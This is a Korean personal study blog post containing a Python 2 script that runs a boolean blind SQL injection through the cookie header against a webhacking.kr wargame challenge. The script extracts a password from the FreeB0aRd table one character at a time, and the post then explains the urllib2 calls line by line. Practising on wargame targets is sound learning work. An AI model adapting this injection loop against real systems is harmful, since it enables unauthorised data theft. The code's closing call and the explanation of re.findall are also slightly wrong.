메모장 입니다2

blind sql injection source 본문

Study/웹

blind sql injection source

Wooum@n 2018. 4. 11. 16:55

import re, urllib2

pw=""

my_cookie = "1"

url = "http://webhacking.kr/challenge/web/web-02"

cookieHeader= ""


for i in range(1, 11):

for j in range(33, 126):

req=urllib2.Request(url)

cookieHeader= "time=1234567890 and (select ascii(substring(password, {}, 1)) from FreeB0aRd)={}; PHPSESSID={}".format(i, j, my_cookie)

print cookieHeader

req.add_header('cookie', cookieHeader)

read=urllib2.urlopen(req).read()

print "-------------------------"

print "Successed that recved data!!"

print "######"

print read

find = re.findall("09:00:01", read)

if find:

print "Successed find to password"

print "######"

pw=pw+chr(j)

print pw

break

print "-------------------------"




print "Password: {}".format(pw)


urllib2.urlclose(req)


////////////////////////////////////////////


 ::FreeB0aRd 테이블에 존재하는 password 컬럼에 대해,




2.소스 설명  ::프로그램 동작을 보고 기능을 유추한 것


-req=urllib2.Request(url)

>해당 url에 대한 Request 패킷 생성


-req.add_header('cookie', cookieHeader)

>문자열 cookieHeader의 값을 cookie 헤더에 추가


-urllib2.urlopen(req).read()

>작성한 Request 패킷을 전송.


>read()

>>Responsed 패킷을 읽어옴.


 -re.findall(Dest, string)

>Dest에서 string에 해당하는 문자열이 있는지


'Study > ' 카테고리의 다른 글

Webhakcking.kr - chall2  (0) 2020.02.25
블라인드 sql 인젝션 - 컬럼, 테이블 명 알아내기 및 기타 등등  (0) 2020.02.25
Webhacking.kr 현황  (0) 2020.02.22
SQL] LIKE 연산자  (0) 2018.04.11
picoctf - A Happy Union  (0) 2018.04.11